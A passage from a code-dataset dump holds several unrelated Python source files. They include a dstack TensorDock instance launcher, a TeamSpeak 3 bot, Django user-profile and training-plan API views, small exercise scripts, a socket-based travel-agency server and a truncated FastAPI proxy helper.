registry_auth_required=job.job_spec.registry_auth is not None,\n )\n try:\n resp = self.api_client.deploy_single(\n instance_name=job.job_spec.job_name,\n instance=instance_offer.instance,\n cloudinit={\n \"ssh_pwauth\": False, # disable password auth\n \"users\": [\n \"default\",\n {\n \"name\": \"user\",\n \"ssh_authorized_keys\": [\n run.run_spec.ssh_key_pub.strip(),\n project_ssh_public_key.strip(),\n ],\n },\n ],\n \"runcmd\": [\n [\"sh\", \"-c\", \" && \".join(commands)],\n ],\n \"write_files\": [\n {\n \"path\": \"/etc/docker/daemon.json\",\n \"content\": json.dumps(\n {\n \"runtimes\": {\n \"nvidia\": {\n \"path\": \"nvidia-container-runtime\",\n \"runtimeArgs\": [],\n }\n },\n \"exec-opts\": [\"native.cgroupdriver=cgroupfs\"],\n }\n ),\n }\n ],\n },\n )\n except requests.HTTPError as e:\n logger.warning(\"Got error from tensordock: %s\", e)\n raise NoCapacityError()\n return LaunchedInstanceInfo(\n instance_id=resp[\"server\"],\n ip_address=resp[\"ip\"],\n region=instance_offer.region,\n username=\"user\",\n ssh_port={v: k for k, v in resp[\"port_forwards\"].items()}[\"22\"],\n dockerized=True,\n )\n\n def terminate_instance(\n self, instance_id: str, region: str, backend_data: Optional[str] = None\n ):\n try:\n self.api_client.delete_single(instance_id)\n except requests.HTTPError:\n pass\n","repo_name":"dstackai/dstack","sub_path":"src/dstack/_internal/core/backends/tensordock/compute.py","file_name":"compute.py","file_ext":"py","file_size_in_byte":4333,"program_lang":"python","lang":"en","doc_type":"code","stars":859,"dataset":"github-code","pt":"43"} +{"seq_id":"9274776743","text":"import configparser\nimport logging\nimport os\nfrom distutils.util import strtobool\n\nimport ts3API.TS3Connection\nfrom ts3API.TS3Connection import TS3QueryException\nfrom ts3API.TS3QueryExceptionType import TS3QueryExceptionType\n\nimport CommandHandler\nimport EventHandler\nimport Moduleloader\n\n\ndef stop_conn(ts3conn):\n ts3conn.stop_recv.set()\n\n\ndef send_msg_to_client(ts3conn, clid, msg):\n \"\"\"\n Convenience method for sending a message to a client without having a bot object.\n :param ts3conn: TS3Connection to send message on.\n :type ts3conn: ts3API.TS3Connection\n :param clid: Client id of the client to send too.\n :type clid: int\n :param msg: Message to send\n :type msg: str\n :return:\n \"\"\"\n try:\n ts3conn.sendtextmessage(targetmode=1, target=clid, msg=msg)\n except ts3API.TS3Connection.TS3QueryException:\n logger = logging.getLogger(\"bot\")\n logger.exception(\"Error sending a message to clid \" + str(clid))\n\n\nclass Ts3Bot:\n \"\"\"\n Teamspeak 3 Bot with module support.\n \"\"\"\n def get_channel_id(self, name):\n \"\"\"\n Covenience method for getting a channel by name.\n :param name: Channel name to search for, can be a pattern\n :type name: str\n :return: Channel id of the first channel found\n :rtype: int\n \"\"\"\n ret = self.ts3conn.channelfind(pattern=name)\n return int(ret[0][\"cid\"])\n\n @staticmethod\n def bot_from_config(config):\n \"\"\"\n Create a bot from the values parsed from config.ini\n :param config: a configuration for the bot\n :type config: dict\n :return: Created Bot\n :rtype: Ts3Bot\n \"\"\"\n logger = logging.getLogger(\"bot\")\n plugins = config\n config = config.pop('General')\n return Ts3Bot(logger=logger, plugins=plugins, **config)\n\n @staticmethod\n def parse_config(logger):\n \"\"\"\n Parse the config file config.ini\n :param logger: Logger to log errors to.\n :return: Dictionary containing options necessary to create a new bot\n :rtype: dict[str, dict[str, str]]\n \"\"\"\n config = configparser.ConfigParser()\n if len(config.read('config.ini')) == 0:\n logger.error(\"Config file missing!\")\n exit()\n if not config.has_section('General'):\n logger.error(\"Config file is missing general section!\")\n exit()\n if not config.has_section('Plugins'):\n logger.error(\"Config file is missing plugins section\")\n exit()\n return config._sections\n\n def connect(self):\n \"\"\"\n Connect to the server specified by self.host and self.port.\n :return:\n \"\"\"\n try:\n self.ts3conn = ts3API.TS3Connection.TS3Connection(self.host, self.port,\n use_ssh=self.is_ssh, username=self.user,\n password=self.password, accept_all_keys=self.accept_all_keys,\n host_key_file=self.host_key_file,\n use_system_hosts=self.use_system_hosts, sshtimeout=self.sshtimeout, sshtimeoutlimit=self.sshtimeoutlimit)\n # self.ts3conn.login(self.user, self.password)\n except ts3API.TS3Connection.TS3QueryException:\n self.logger.exception(\"Error while connecting, IP propably not whitelisted or Login data wrong!\")\n # This is a very ungraceful exit!\n os._exit(-1)\n raise\n\n def setup_bot(self):\n \"\"\"\n Setup routine for new bot. Does the following things:\n 1. Select virtual server specified by self.sid\n 2. Set bot nickname to the Name specified by self.bot_name\n 3. Move the bot to the channel specified by self.default_channel\n 4. Register command and event handlers\n :return:\n \"\"\"\n try:\n self.ts3conn.use(sid=self.sid)\n except ts3API.TS3Connection.TS3QueryException:\n self.logger.exception(\"Error on use SID\")\n exit()\n try:\n try:\n self.ts3conn.clientupdate([\"client_nickname=\" + self.bot_name])\n except TS3QueryException as e:\n if e.type == TS3QueryExceptionType.CLIENT_NICKNAME_INUSE:\n self.logger.info(\"The choosen bot nickname is already in use, keeping the default nickname\")\n else:\n raise e\n try:\n self.channel = self.get_channel_id(self.default_channel)\n self.ts3conn.clientmove(self.channel, int(self.ts3conn.whoami()[\"client_id\"]))\n except TS3QueryException as e:\n if e.type == TS3QueryExceptionType.CHANNEL_ALREADY_IN:\n self.logger.info(\"The bot is already in the configured default channel\")\n else:\n raise e\n except TS3QueryException:\n self.logger.exception(\"Error on setting up client\")\n self.ts3conn.quit()\n return\n self.command_handler = CommandHandler.CommandHandler(self.ts3conn)\n self.event_handler = EventHandler.EventHandler(ts3conn=self.ts3conn, command_handler=self.command_handler)\n try:\n self.ts3conn.register_for_server_events(self.event_handler.on_event)\n self.ts3conn.register_for_channel_events(0, self.event_handler.on_event)\n self.ts3conn.register_for_private_messages(self.event_handler.on_event)\n except ts3API.TS3Connection.TS3QueryException:\n self.logger.exception(\"Error on registering for events.\")\n exit()\n\n def __del__(self):\n if self.ts3conn is not None:\n self.ts3conn.quit()\n\n def __init__(self, host, port, serverid, user, password, defaultchannel, botname, logger, plugins, ssh=\"False\",\n acceptallsshkeys=\"False\", sshhostkeyfile=None, sshloadsystemhostkeys=\"False\", sshtimeout=None, sshtimeoutlimit=3, *_, **__):\n \"\"\"\n Create a new Ts3Bot.\n :param host: Host to connect to, can be a IP or a host name\n :param port: Port to connect to\n :param sid: Virtual Server id to use\n :param user: Server Query Admin Login Name\n :param password: Server Query Admin Password\n :param default_channel: Channel to move the bot to\n :param bot_name: Nickname of the bot\n :param logger: Logger to use throughout the bot\n \"\"\"\n self.host = host\n self.port = port\n self.user = user\n self.password = password\n self.sid = serverid\n self.default_channel = defaultchannel\n self.bot_name = botname\n self.event_handler = None\n self.command_handler = None\n self.channel = None\n self.logger = logger\n self.ts3conn = None\n self.is_ssh = bool(strtobool(ssh))\n # Strtobool returns 1/0 ...\n self.accept_all_keys = bool(strtobool(acceptallsshkeys))\n self.host_key_file = sshhostkeyfile\n self.use_system_hosts = bool(strtobool(sshloadsystemhostkeys))\n self.sshtimeout = sshtimeout\n self.sshtimeoutlimit = sshtimeoutlimit\n\n self.connect()\n self.setup_bot()\n # Load modules\n Moduleloader.load_modules(self, plugins)\n self.ts3conn.start_keepalive_loop()\n","repo_name":"Murgeye/teamspeak3-python-bot","sub_path":"Bot.py","file_name":"Bot.py","file_ext":"py","file_size_in_byte":7464,"program_lang":"python","lang":"en","doc_type":"code","stars":26,"dataset":"github-code","pt":"43"} +{"seq_id":"72430971009","text":"import datetime\nimport logging\n\nfrom django.conf import settings\nfrom django.core.cache import cache\nfrom drf_yasg.utils import swagger_auto_schema\nfrom rest_framework import generics\nfrom rest_framework.response import Response\nfrom rest_framework.views import APIView\n\nfrom core.apps.common.common_functions import (\n cache_data,\n clear_user_cache_with_prefix,\n pillar_response,\n pro_feature,\n)\nfrom core.apps.common.const import USER_UTP_SETTINGS_QUEUE_PRIORITIES\nfrom core.apps.common.enums.service_enum import ServiceType\nfrom core.apps.common.pillar_responses import PillarResponse\nfrom core.apps.common.utils import (\n get_user_from_session_destroy_session_variable,\n log_extra_fields,\n make_context,\n)\nfrom core.apps.packages.tasks import create_package_plan\nfrom core.apps.packages.utils import create_user_knowledge_hub_entries\nfrom core.apps.plan.models import UserPlan\nfrom core.apps.plan.tasks import create_plan\nfrom core.apps.utp.utils import update_utp_settings\n\nfrom ....avatar import get_avatar\nfrom ....models import ProfileImage, UserActivityLog, UserProfile\nfrom ....services import AddNewGoalService, save_goal_data\nfrom ....utils import clear_trainer_cache\nfrom .schema import (\n CreateTrainingPlanV2SchemaView,\n UserAvailabilityDataV2ViewSchema,\n UserBasicInfoV2ViewSchema,\n UserFileProcessInfoV2ViewSchema,\n UserFitnessInfoExistV2ViewSchema,\n UserFitnessInfoV2ViewSchema,\n UserOnboardingViewSchema,\n UserSupportSchemaView,\n)\nfrom .services import UserProfileServiceV2, UserSupportServiceV2\n\nlogger = logging.getLogger(__name__)\n\n\nclass UserBasicInfoViewV2(APIView):\n \"\"\"Return user basic info like email, joining date etc.\"\"\"\n\n success_msg = \"Returned User Basic Info Successfully\"\n error_msg = \"Could not return User Basic Info\"\n\n @swagger_auto_schema(\n tags=UserBasicInfoV2ViewSchema.tags,\n responses=UserBasicInfoV2ViewSchema.responses,\n )\n @cache_data\n @pillar_response()\n def get(self, request, **kwargs):\n user_id = request.session[\"user_id\"]\n response_data = UserProfileServiceV2(user_id=user_id).get_basic_info()\n cache.set(kwargs[\"cache_key\"], response_data, timeout=settings.CACHE_TIME_OUT)\n return response_data\n\n @pillar_response()\n def post(self, request):\n user_id = request.session[\"user_id\"]\n timezone = request.data.get(\"timezone\")\n UserProfileServiceV2(user_id=user_id).update_basic_info(\n timezone_id=timezone.get(\"timezone_id\") if timezone else None,\n weight=request.data.get(\"weight\"),\n )\n clear_user_cache_with_prefix(user_id + \"&\" + request.path, user_id)\n\n\nclass UserFitnessInfoViewV2(APIView):\n \"\"\"Return user fitness data like ftp, fthr etc.\"\"\"\n\n success_msg = \"Returned User fitness data Successfully\"\n error_msg = \"Could not return User fitness data\"\n\n @swagger_auto_schema(\n tags=UserFitnessInfoV2ViewSchema.tags,\n responses=UserFitnessInfoV2ViewSchema.responses,\n )\n @cache_data\n @pillar_response()\n def get(self, request, **kwargs):\n user_id = request.session[\"user_id\"]\n response_data = UserProfileServiceV2(user_id=user_id).get_current_fitness_data(\n calculate_mhr_from_age=False\n )\n cache.set(kwargs[\"cache_key\"], response_data, timeout=settings.CACHE_TIME_OUT)\n return response_data\n\n @pillar_response()\n def post(self, request):\n user_id = request.session[\"user_id\"]\n UserProfileServiceV2(user_id=user_id).save_fitness_info(\n ftp=request.data.get(\"ftp\"),\n fthr=request.data.get(\"fthr\"),\n mhr=request.data.get(\"mhr\"),\n )\n clear_user_cache_with_prefix(prefix=user_id, user_id=user_id)\n clear_trainer_cache(user_id)\n\n\nclass UserFitnessInfoExistViewV2(APIView):\n \"\"\"Check user fitness data like ftp, fthr etc. exist or not\"\"\"\n\n success_msg = \"Returned User fitness exist info Successfully\"\n error_msg = \"Could not return User fitness data exist info\"\n\n @swagger_auto_schema(\n tags=UserFitnessInfoExistV2ViewSchema.tags,\n request_body=UserFitnessInfoExistV2ViewSchema.request_schema,\n responses=UserFitnessInfoExistV2ViewSchema.responses,\n )\n @cache_data\n def post(self, request, cache_key):\n user_id = request.session[\"user_id\"]\n activity_datetime_str = request.data.get(\"activity_datetime\")\n try:\n response_data = UserProfileServiceV2(\n user_id=user_id\n ).baseline_fitness_exist(activity_datetime_str)\n\n error, message = False, self.success_msg\n cache.set(cache_key, response_data, timeout=settings.CACHE_TIME_OUT)\n except Exception as e:\n logger.exception(\n self.error_msg,\n extra=log_extra_fields(\n exception_message=str(e),\n request_url=request.path,\n user_id=user_id,\n service_type=ServiceType.API.value,\n ),\n )\n error, message, response_data = True, self.error_msg, None\n return Response(make_context(error=error, message=message, data=response_data))\n\n\nclass UserFileProcessInfoViewV2(APIView):\n \"\"\"Return user file process info\"\"\"\n\n success_msg = \"Returned User file process info Successfully\"\n error_msg = \"Could not return User file process info\"\n\n @swagger_auto_schema(\n tags=UserFileProcessInfoV2ViewSchema.tags,\n request_body=UserFileProcessInfoV2ViewSchema.request_schema,\n responses=UserFileProcessInfoV2ViewSchema.responses,\n )\n @cache_data\n def post(self, request, cache_key):\n user_id = request.session[\"user_id\"]\n activity_datetime_str = request.data.get(\"activity_datetime\")\n try:\n response_data = UserProfileServiceV2(user_id=user_id).get_file_process_info(\n activity_datetime_str\n )\n\n error, message = False, self.success_msg\n cache.set(cache_key, response_data, timeout=settings.CACHE_TIME_OUT)\n except Exception as e:\n logger.exception(\n self.error_msg,\n extra=log_extra_fields(\n exception_message=str(e),\n request_url=request.path,\n user_id=user_id,\n service_type=ServiceType.API.value,\n ),\n )\n error, message, response_data = True, self.error_msg, None\n return Response(make_context(error=error, message=message, data=response_data))\n\n\nclass UserTimezoneDataViewV2(APIView):\n \"\"\"Return user timezone data like timezone name, offset etc.\"\"\"\n\n success_msg = \"Returned data successfully\"\n error_msg = \"Could not return User timezone data\"\n\n @swagger_auto_schema(responses=UserAvailabilityDataV2ViewSchema.responses)\n @cache_data\n def get(self, request, cache_key):\n user_id = request.session[\"user_id\"]\n try:\n response_data = UserProfileServiceV2.get_timezone_data()\n data = {\"timezones\": response_data}\n\n cache.set(cache_key, data, timeout=settings.CACHE_TIME_OUT)\n return Response(make_context(message=self.success_msg, data=data))\n except Exception as e:\n logger.exception(\n self.error_msg,\n extra=log_extra_fields(\n exception_message=str(e),\n request_url=request.path,\n user_id=user_id,\n service_type=ServiceType.API.value,\n ),\n )\n return Response(make_context(error=True, message=self.error_msg))\n\n\nclass UserProfileInfoViewV2(generics.GenericAPIView):\n @cache_data\n @pillar_response()\n def get(self, request, **kwargs):\n user_id = request.session[\"user_id\"]\n logger.info(\"Fetching user profile data\")\n user_profile = UserProfile.objects.filter(\n user_id=user_id, is_active=True\n ).last()\n logger.info(\"Fetching profile image data\")\n profile_image = ProfileImage.objects.filter(\n user_id=user_id, is_active=True\n ).first()\n profile_image_url = profile_image.avatar.url if profile_image else get_avatar()\n\n response_data = {\n \"full_name\": user_profile.full_name,\n \"first_name\": user_profile.name,\n \"avatar\": profile_image_url,\n \"threshold_graph_start_date\": 1,\n }\n cache.set(kwargs[\"cache_key\"], response_data, timeout=settings.CACHE_TIME_OUT)\n\n return response_data\n\n\nclass UserOnboardingView(generics.GenericAPIView):\n activity_code = UserActivityLog.ActivityCode.USER_ONBOARDING\n\n @swagger_auto_schema(\n tags=UserOnboardingViewSchema.tags,\n request_body=UserOnboardingViewSchema.request_schema,\n responses=UserOnboardingViewSchema.responses,\n )\n @pillar_response(activity_code)\n def post(self, request):\n \"\"\"Gets the onboarding data of a new user and saves them\"\"\"\n logger.info(\"Onboarding API called\")\n user_id = request.session[\"user_id\"]\n logger.info(f\"{str(user_id)}\")\n\n try:\n response = UserProfileServiceV2.save_user_onboarding_data(\n user_id, request.data\n )\n except Exception as e:\n failed_msg = \"Could not save onboarding data\"\n logger.exception(\n failed_msg,\n extra=log_extra_fields(\n user_id=user_id,\n exception_message=str(e),\n service_type=ServiceType.API.value,\n request_url=request.path,\n ),\n )\n response = make_context(True, failed_msg, None)\n return response\n\n\nclass UserPortalOnboardingView(generics.GenericAPIView):\n def post(self, request):\n \"\"\"Gets the portal onboarding data of a new user and saves them\"\"\"\n logger.info(\"Portal Onboarding API called\")\n user_id = request.session[\"user_id\"]\n logger.info(f\"{str(user_id)}\")\n\n try:\n response = UserProfileServiceV2.save_user_portal_onboarding_data(\n user_id, request.data\n )\n except Exception as e:\n logger.exception(\n \"Could not save portal onboarding data\",\n extra=log_extra_fields(\n user_id=user_id,\n exception_message=str(e),\n service_type=ServiceType.API.value,\n request_url=request.path,\n ),\n )\n response = make_context(True, \"Could not save onboarding data\", None)\n # TODO seems PillarResponse is not working. Test with PillarResponse and replace Response with confirmation\n # return PillarResponse(user_id, request, response, self.activity_code)\n return Response(response)\n\n\nclass CreateTrainingPlanViewV2(APIView):\n \"\"\"\n This api is for creating user training plan with given profile data.\n \"\"\"\n\n no_user_found_msg = \"You are not allowed to create plan\"\n data_missing_msg = \"Some data needed to create plan are missing\"\n success_message = \"Saved goal data and created training plan successfully\"\n\n @swagger_auto_schema(\n request_body=CreateTrainingPlanV2SchemaView.request_schema,\n responses=CreateTrainingPlanV2SchemaView.responses,\n )\n @pro_feature\n def post(self, request):\n user = get_user_from_session_destroy_session_variable(request)\n user_event_data = request.data.get(\"event_data\")\n user_package_data = request.data.get(\"package_data\")\n user_schedule_data = request.data.get(\"schedule_data\")\n ctp_activity_code = UserActivityLog.ActivityCode.CREATE_TRAINING_PLAN\n try:\n if user_event_data and user_package_data:\n error_message = \"Invalid user goal info\"\n logger.error(\n error_message,\n extra=log_extra_fields(\n user_id=user.code,\n user_auth_id=user.id,\n request_url=request.path,\n service_type=ServiceType.API.value,\n ),\n )\n response = make_context(True, error_message, None)\n return PillarResponse(user, request, response, ctp_activity_code)\n\n user_local_date = user.user_local_date\n if UserPlan.objects.filter(\n user_id=user.code, is_active=True, end_date__gte=user_local_date\n ).exists():\n error_message = \"Current goal has not been completed yet\"\n logger.error(\n error_message,\n extra=log_extra_fields(\n user_id=user.code,\n user_auth_id=user.id,\n request_url=request.path,\n service_type=ServiceType.API.value,\n ),\n )\n response = make_context(True, error_message, None)\n return PillarResponse(user, request, response, ctp_activity_code)\n\n if user.user_plans.filter(is_active=True).exists():\n # If there was a previous goal of the user and it was completed,\n # then goal is created according to the add new goal flow. This is\n # different from the flow that is followed when creating the first goal\n return AddNewGoalService(request, user).add_new_goal()\n\n if not user:\n logger.info(\"No allowed user found for create training plan request\")\n return PillarResponse(\n user,\n request,\n make_context(True, self.no_user_found_msg, None),\n ctp_activity_code,\n )\n\n extra_log_fields = log_extra_fields(\n user_auth_id=user.id,\n service_type=ServiceType.API.value,\n request_url=request.path,\n )\n\n if not (user_event_data or user_package_data) or not user_schedule_data:\n logger.info(\n \"Some data needed to create plan are missing\",\n extra=extra_log_fields,\n )\n return PillarResponse(\n user,\n request,\n make_context(True, self.data_missing_msg, None),\n ctp_activity_code,\n )\n\n goal_data_saved, message = save_goal_data(user, request)\n\n if not goal_data_saved:\n return PillarResponse(\n user, request, make_context(True, message, None), ctp_activity_code\n )\n\n update_utp_settings(\n user,\n True,\n USER_UTP_SETTINGS_QUEUE_PRIORITIES[2],\n datetime.datetime.now() + datetime.timedelta(hours=48),\n reason=\"48 hour rule\",\n )\n\n update_utp_settings(\n user,\n user.is_third_party_connected(),\n USER_UTP_SETTINGS_QUEUE_PRIORITIES[3],\n datetime.datetime.now(),\n reason=\"\",\n )\n logger.info(\n \"Updated UTP settings during create training plan\",\n extra=extra_log_fields,\n )\n\n if user_event_data:\n create_plan(user)\n if user_package_data:\n package_id = user_package_data.get(\"id\")\n user_package_duration = user_package_data.get(\"total_weeks\")\n create_package_plan(user.code, package_id, user_package_duration)\n create_user_knowledge_hub_entries(user, package_id)\n response = make_context(False, self.success_message, None)\n\n except Exception as e:\n msg = \"Could not create training plan\"\n logger.exception(\n msg,\n extra=log_extra_fields(\n user_auth_id=user.id,\n exception_message=str(e),\n service_type=ServiceType.API.value,\n request_url=request.path,\n ),\n )\n response = make_context(True, msg, None)\n\n return PillarResponse(user, request, response, ctp_activity_code)\n\n\nclass UserSupportView(APIView):\n \"\"\"This api is for creating user support ticket\"\"\"\n\n @swagger_auto_schema(\n tags=UserSupportSchemaView.tags,\n request_body=UserSupportSchemaView.request_schema,\n responses=UserSupportSchemaView.responses,\n )\n def post(self, request):\n success_msg = \"User support request submitted successfully\"\n error_msg = \"Could not submit user support request\"\n user_support_activity_code = UserActivityLog.ActivityCode.USER_SUPPORT_REQUEST\n\n \"\"\"\n post user support message to notion and slack\n \"\"\"\n user_id = request.session[\"user_id\"]\n log_extra_data = log_extra_fields(\n user_id=user_id,\n service_type=ServiceType.API.value,\n request_url=request.path,\n )\n\n try:\n UserSupportServiceV2.post_user_support_message(request)\n logger.info(success_msg, extra=log_extra_data)\n response = make_context(False, success_msg, None)\n except Exception as e:\n logger.exception(\n error_msg,\n extra=log_extra_fields(\n user_id=user_id,\n exception_message=str(e),\n service_type=ServiceType.API.value,\n request_url=request.path,\n ),\n )\n response = make_context(True, error_msg, None)\n\n # file can't be stored in activity log\n if request.data.get(\"file\") is not None:\n request.data.pop(\"file\")\n if request.data.get(\"user_log\") is not None:\n request.data.pop(\"user_log\")\n\n return PillarResponse(\n user_id=user_id,\n request=request,\n data=response,\n activity_code=user_support_activity_code,\n )\n","repo_name":"yass-arafat/code-samples","sub_path":"core/apps/user_profile/api/versioned/v2/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":18346,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"36859034608","text":"from itertools import permutations\nfrom utils import *\n\n\nnbinco = 3\nfor i in range(999):\n\tstri = str(i) + 'X' * nbinco + '0' * (nbinco - len(str(i)))\n\tfor perm in permutations(stri):\n\t\tnbperm = 0\n\t\tfor j in range(10):\n\t\t\tisprim = int(''.join(perm).replace('X', str(j)))\n\t\t\tif isprim > 10000 and is_prime(isprim):\n\t\t\t\tnbperm += 1\n\t\tif nbperm == 8:\n\t\t\tprint(\"8 permutations: %s \" % (''.join(perm)))\n\t\t\texit()","repo_name":"AFeuillet/CodingGames","sub_path":"Euler/051.py","file_name":"051.py","file_ext":"py","file_size_in_byte":406,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"41628593030","text":"import pandas as pd\nfrom requestsData import request_students_in_data_frame\nfrom requestsData import request_students\n\ndef search_the_best_course_by_gpa():\n course_average = request_students()\n print(course_average)\n sorted_course_average = sorted(course_average, key=lambda item: item[list(item.keys())[0]], reverse=True)\n\n print('\\nThe best course by medium score:')\n print(sorted_course_average[0])\n\nsearch_the_best_course_by_gpa()\n\n### <---\n\nstudent_data_frame = request_students_in_data_frame()\n\n### <---\n\ndef save_to_csv(data: pd.DataFrame):\n data.to_csv('data.csv')\n\n### <---\n\ndef search_mid_value(data: pd.DataFrame):\n print(\"Enter the grade mid\")\n value_for_search = float(input())\n student_id = data[\"gradeMid\"].sub(value_for_search).abs().idxmin()\n print(data.iloc[[student_id]])\n\n### <---\n\nsave_to_csv(student_data_frame)\nsearch_mid_value(student_data_frame)","repo_name":"Gre7/PythonHSE","sub_path":"lab2/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":881,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"40484538723","text":"import socket\r\nimport pickle\r\nfrom threading import Thread\r\n\r\n# NOTE = Sections where a code reviewer found something that needs\r\n# discussion or further investigation.\r\n\r\n# XXX = warning about possible pitfalls, can be used as NOTE:XXX\r\n\r\n# HACK = not very well written or malformed code to circumvent problem/\r\n# bug should be used as HACK:FIXME:\r\n\r\n# FIXME = this works, sort of, but it could be done better.\r\n\r\n# BUG = there is a problem here.\r\n\r\n# TODO = no problem, but additional code needs to be written,\r\n# usually when you are skipping something\r\n\r\n# NOTE - Burada airline server tarafına HTTP GET mesajı atıyoruz.\r\ndef client_accept_airline_conn(company_name):\r\n\r\n message = \"GET /{}/flights HTTP/1.1\" + \" \" \\\r\n \"params: {} {} {} {}\"\\\r\n .format(company_name, start_date, flight_from, flight_to)\r\n\r\n client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\n client.connect((socket.gethostname(), 12344))\r\n client.send(message.encode())\r\n\r\n client_receive_airline(client)\r\n\r\n# NOTE:XXX - Burada serverdan gelen query sonucunu alcak ve\r\n# gelen sonucu gui tarafına gönderecek.\r\ndef client_receive_airline(sock):\r\n \"\"\" Handles receiving messages from server \"\"\"\r\n try:\r\n all_message = sock.recv(512)\r\n message_list = pickle.loads(all_message)\r\n print(message_list[0]) # HTTP/1.1 OK\r\n\r\n for item in message_list[1]:\r\n print(item[0])\r\n\r\n except OSError: # client has left\r\n print(OSError)\r\n\r\n# NOTE - Burada hotel server tarafına HTTP GET mesajı atıyoruz.\r\ndef client_accept_hotel_conn(hotel_name):\r\n message = \"GET /{}/available_rooms HTTP/1.1\" + \" \" \\\r\n \"params: {} {} {} {}\" \\\r\n .format(hotel_name, flight_to, start_date, return_date)\r\n\r\n client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\n client.connect((socket.gethostname(), 12345))\r\n client.send(message.encode())\r\n\r\n client_receive_hotels(client)\r\n\r\n# NOTE:XXX - Burada serverdan gelen query sonucunu alcak ve\r\n# gelen sonucu gui tarafına gönderecek.\r\ndef client_receive_hotels(sock):\r\n \"\"\" Handles receiving messages from server \"\"\"\r\n try:\r\n all_message = sock.recv(512)\r\n message_list = pickle.loads(all_message)\r\n print(message_list[0]) # HTTP/1.1 OK\r\n\r\n for item in message_list[1]:\r\n print(item[0])\r\n\r\n except OSError: # client has left\r\n print(OSError)\r\n\r\n\r\n# NOTE - Burası gelen client isteklerini ilk karşıladığımız yer.\r\naddresses = {}\r\ndef server_accept_conn():\r\n while True:\r\n conn, addr = server.accept()\r\n print(\"{} has connected.\".format(addr))\r\n addresses[conn] = addr\r\n Thread(target=server_handle_client, args=(conn, addr)).start()\r\n\r\n# NOTE - Client tarafından gelen mesajları dinlediğimiz yer.\r\ndef server_handle_client(conn, address):\r\n while True:\r\n try:\r\n message = conn.recv(512).decode() # Clienttan mesajı aldık\r\n start_date = message.split()[0]\r\n return_date = message.split()[1]\r\n number_of_people = message.split()[2]\r\n pref_hotels = message.split()[3]\r\n pref_airline = message.split()[4]\r\n flight_from = message.split()[5]\r\n flight_to = message.split()[6]\r\n\r\n client_accept_airline_conn(\"turkish_airlines\")\r\n client_accept_airline_conn(\"pegasus_airlines\")\r\n client_accept_hotel_conn(\"ceasers_palace\")\r\n client_accept_hotel_conn(\"divan_hotel\")\r\n conn.send(message.encode())\r\n #client = socket.socket()\r\n except OSError:\r\n print(\"{} has left.\".format(address))\r\n break\r\n conn.close()\r\n\r\n\r\nPORT = 6000\r\nserver = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\nserver.bind((socket.gethostname(), PORT))\r\nserver.listen()\r\nstart_date = \"\"; return_date = \"\"; number_of_people = \"\"\r\npref_hotels = \"\"; pref_airline = \"\"\r\nflight_from = \"\"; flight_to = \"\"\r\nserver_thread = Thread(target=server_accept_conn).start()\r\n","repo_name":"muhammetseramet/School-Projects","sub_path":"computer networks/project/agency.py","file_name":"agency.py","file_ext":"py","file_size_in_byte":4110,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"43"} +{"seq_id":"20297323433","text":"from time import sleep\n\nprint(\"-\" * 20, \"GERADOR DE PA 3.0\", \"-\" * 20)\n\nprimeiro_termo = int(input(\"Digite o primeiro termo da progressão aritmética: \\n\"))\nrazao = int(input(\"Agora digite a razão: \\n\"))\nwhile razao == 0:\n razao = int(input(\"A razão não pode ser 0. Por favor, digite outro valor: \\n\"))\nnumeroTermos = 10\ncontador = 1\ntermos = []\n\nwhile True:\n while contador <= numeroTermos:\n termo = primeiro_termo + (contador - 1) * razao\n contador += 1\n termos.append(termo)\n if contador == numeroTermos:\n print(f\"A progressão aritmética é: {', '.join(map(str, termos))}.\", end=\" \")\n sleep(2)\n mais = int(input(\"\\nQuantos termos deseja adicionar a progressão?\\n\"))\n if mais == 0:\n print(\"Obrigado por utilizar meu programa.\")\n print(f\"A PA teve {numeroTermos} termos.\")\n break\n else:\n numeroTermos += mais\n","repo_name":"hamiltonGomes/learning_python","sub_path":"Exercícios - Mundo 2/while/progressao_aritmetica3.0.py","file_name":"progressao_aritmetica3.0.py","file_ext":"py","file_size_in_byte":966,"program_lang":"python","lang":"pt","doc_type":"code","stars":1,"dataset":"github-code","pt":"43"} +{"seq_id":"8994567389","text":"from app.clients.bifrost.admin import BifrostService, ResourceNotFoundError\nfrom app.clients.bifrost.validate import validate\nfrom app.context import Context\nfrom app.exception import AppException\nfrom app.filter import FilterWithSchema\nfrom ddtrace import tracer\nfrom fastapi import Request\nfrom jsonschema import ValidationError\n\nimport app.openapi\nimport jsonschema\nimport re\nimport time\n\n\nbifrostService = BifrostService()\n\nspec = app.openapi.load()\nif spec is None: \n raise Exception(\"Could not load openapi spec in thumbnail.py\")\n\nfilter = FilterWithSchema(spec)\n\ndef get_token(request_obj: Request) -> str:\n \"\"\"Extracts the jwt from the http headers. Format must be Authorization: bearer JWT\n\n Args:\n request_obj (Request): http request\n\n Returns:\n str: The encoded jwt\n \"\"\"\n\n auth_header = request_obj.headers.get(\"Authorization\", \"\")\n if not auth_header:\n raise AppException('missing', event='Auth.Headers', status_code=401)\n header_split: str = auth_header.split(\" \")\n if len(header_split) != 2:\n raise AppException('incorrect length', event='Auth.Headers', status_code=401)\n\n if header_split[0].lower() != \"bearer\":\n raise AppException('no bearer', event='Auth.Headers', status_code=401)\n \n return header_split[1]\n\n\nasync def bifrost(http_request, action, name, request={}, args={}):\n context = Context(http_request)\n context.set('name', name)\n context.set('action', action)\n\n request_body = {}\n if http_request.method != \"GET\" and len(await http_request.body()):\n request_body = await http_request.json()\n else:\n request_body = dict(http_request.query_params)\n\n # preprocess request_body\n for (name,spec) in request.items():\n if name not in request_body and 'default' in spec:\n request_body[name] = spec['default']\n\n rename_key = 'map_to'\n if name in request_body and rename_key in spec:\n val = request_body.pop(name)\n request_body[spec[rename_key]] = val\n\n # append extra args to request body\n for (key,val) in args.items():\n request_body[key] = val\n\n bifrostService = await Thumbnail.from_http(http_request=http_request)\n result = await bifrostService.call(action, args=request_body)\n\n result = filter.filter_response(http_request.scope[\"endpoint\"].__name__, result)\n return 